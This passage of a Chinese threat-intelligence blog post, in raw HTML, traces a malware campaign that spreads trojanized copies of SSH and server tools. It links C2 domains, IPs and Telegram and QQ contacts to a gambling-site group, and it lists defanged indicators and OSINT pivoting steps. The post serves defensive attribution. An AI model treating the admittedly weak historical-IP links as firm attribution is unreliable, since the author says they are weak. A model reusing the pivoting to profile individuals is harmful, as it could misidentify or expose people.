4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXXn519[.]com</span></code><span leaf="">  的资源，看上去这个图之前可能是个logo。</span></p><p><img data-imgfileid="100001564" class="rich_pages wxw-img" data-ratio="0.2377906976744186" data-s="300,640" data-type="png" data-w="3440" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=35219542&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9Z9Le0aIVlzjd23W69FEz1k39npF44uMMsicJFx1tCOzmU8ialz7NhpAA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></li></ol><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">所以综合来看， 4 个✈️号 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX</span></code><span leaf=""> 、 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX</span></code><span leaf=""> 、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX</span></code><span leaf=""> 、 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">@XXXX </span></code><span leaf=""> 和两个 QQ 号 XXXX、XXXX 极大概率是同一个团队或者公司的人，看上去最少应该是互相认识的。</span></p><h6 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 14px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">联系方式拓展</span></span><span style="display: none;"></span></h6><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">上面确认了 4 个✈️号和 2 个 QQ 号大概率是跟XX会密切绑定的，计划使用联系方式在网络空间测绘进行信息搜集。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是由于 QQ 号是被注释掉的，如果广告模板被其他人借鉴之后源代码当中仍然带着 QQ 号，也会一起被搜出来。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">✈️号相对准确，所以✈️号在网络空间测绘进行信息搜集，大致可以得到 </span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">&#34;收购网站&#34;、&#34;收量&#34;、&#34;招聘 SEO 和安全测试&#34;</span></strong><span leaf=""> 这三种广告。</span></p><p><img data-imgfileid="100001563" class="rich_pages wxw-img" data-ratio="0.4137022397891963" data-s="300,640" data-type="png" data-w="1518" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=e3d59bfc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9QVDico8gspMkXx3Vc0lh3E6gSIMicAOJJyETTTuh4k0UneiafMvRdiczEA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">发现域名  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXXnshou[.]com</span></code><span leaf="">  IP 23.225.213.109 （跟 23.225.213.107 相邻）在今年4月10号的时候发布过 &#34;大团队收购网站&#34; 的广告，那时候的 SSL 证书和域名是相对应的，说明网站原本的内容就是收购网站的广告，而不是域名解析残留等情况扫出来的记录。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">23.225.213.107 是谁？</span><span leaf=""><br/></span><span leaf=""><br/></span><span leaf="">maczz.net 曾解析到美国 23.225.213.107</span><span leaf=""><br/></span><span leaf="">mackk.cc 当前解析IP为 23.225.213.107</span><span leaf=""><br/></span><span leaf="">jiXXXXn519.com 曾解析到 23.225.213.107，发布招聘广告</span><span leaf=""><br/></span></code></pre><p><img data-imgfileid="100001565" class="rich_pages wxw-img" data-ratio="0.6215596330275229" data-s="300,640" data-type="png" data-w="1744" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a4a53d98&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9sCoOeS9BGp4OmkxgJkXB8SJWF9wAD022KLiaup3icUpYRq8VUIibvLKQA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">除  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXXnshou[.]com</span></code><span leaf="">  外还有 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.jiXXXXn580[.]com</span></code><span leaf=""> ，在3月底被扫描到网页title是招聘内容，不过证书是  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXXn519[.]com</span></code><span leaf="">  的。<img data-imgfileid="100001567" class="rich_pages wxw-img" data-ratio="0.4648972602739726" data-s="300,640" data-type="png" data-w="2336" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=d85e40a7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9YyQcfTOBaj9gj0GHJBrVO4wDOgJZ6K7Jlic43VocBWEWcXmiba9RiaoLw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><figcaption style="color: rgb(136, 136, 136);font-size: 14px;line-height: 1.5em;letter-spacing: 0em;text-align: center;font-weight: normal;margin-top: 5px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"></figcaption><p><span leaf=""><br/></span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">当前这三个域名都解析到 154.19.200.212，直接访问的话都是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">7zei[.]com</span></code><span leaf=""> 的那个假冒 SSH 页面。</span></p><p><img data-imgfileid="100001566" class="rich_pages wxw-img" data-ratio="0.21367521367521367" data-s="300,640" data-type="png" data-w="1872" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=12224042&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY95RWw7rdPF2NUrZJLlQ6TnXVwP3YFXc4FbzVujgniamP3icgXk96MknDA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">到这里停一下，梳理一下前面推导到这一部分的逻辑：</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">通过初始 C2 update.sslcsdn[.]com 关联到样本 update (35).exe</span><span leaf=""><br/></span><span leaf="">-&gt; update (35).exe 关联了 www.7zei[.]com</span><span leaf=""><br/></span><span leaf="">-&gt; www.7zei[.]com 网站上下载下来的假冒 MobaXterm 加载了 scrt1.nyazz.com、ssh.0523qyfw[.]com 的二段木马</span><span leaf=""><br/></span><span leaf="">-&gt; scrt1.nyazz[.]com、 ssh.0523qyfw[.]com 都曾经在最近（2024/11/04）解析到过 216.83.52.155</span><span leaf=""><br/></span><span leaf="">-&gt; 发现 216.83.52.155 有大量的假冒 navicat、xshell、宝塔、plesk、MobaXterm、AMH、RDM 关联，并且还关联到了 macyy 子域名</span><span leaf=""><br/></span><span leaf="">-&gt; 回溯 macyy 历史上跟 WDCP、LNMP、Oneinstack 投毒有关联，并且 macyy 现在已经改名 maczz</span><span leaf=""><br/></span><span leaf="">-&gt; 发现 maczz 历史解析的 IP 23.225.213.107 上有过 jiXXXXn519[.]com XX会这个菠菜盘的渗透、写🐎、SEO相关的招聘</span><span leaf=""><br/></span><span leaf="">-&gt; 除了招聘广告，根据招聘相关的联系方式还搜到了收量广告，其中两组广告经过分析能够大致确认是XX会发布的</span><span leaf=""><br/></span><span leaf="">-&gt; 根据 telegram 账号搜索测绘结果，关联出 jiXXXXnshou[.]com 和 jiXXXXn580[.]com</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">对应逻辑关系图如下：</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">（虽然  154.19.200.212 和 154.19.200.214 是同一台机器前面已经说过了，但是后面会给出验证确认的过程。）</span></p><p><img data-imgfileid="100001569" class="rich_pages wxw-img" data-ratio="0.37618483412322273" data-s="300,640" data-type="png" data-w="3376" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=56353cec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9UdkUsddJGrUqZMK16ypZDn6HhxBxpRicsXDveNed8OVXouGdEw60GGQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">回看整个关联过程，其中样本关联的部分在逻辑上还算勉强说得过去，但是连着两次历史 IP 解析这里的关联说服力就比较弱了。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">没关系，不要急，我们继续拓线，继续论证。</span></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">新增网络 ioc 继续拓线</span></span><span style="display: none;"></span></h4><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">78341[.]cc - 154.19.200.137</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">刚才根据 216.83.52.155 反查域名解析历史查到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">78341[.]cc</span></code><span leaf="">，这个假冒 Termius 的域名现在解析到 154.19.200.137。</span></p><p><img data-imgfileid="100001568" class="rich_pages wxw-img" data-ratio="0.24118942731277532" data-s="300,640" data-type="png" data-w="1816" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5646ffed&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9lCbeMR211MNIaQPicLdPD6U4xiblOfq08zl5szNwc4z9woMsk9pDRbYA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">搜集 154.19.200.137 的历史主机端口信息拿到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">xshell.95271[.]pw</span></code><span leaf="">。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">95271[.]pw</span></code><span leaf=""> 这个域名在 &#34;纯C2 IP - 154.19.200.133&#34; 那集实际已经出镜过。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 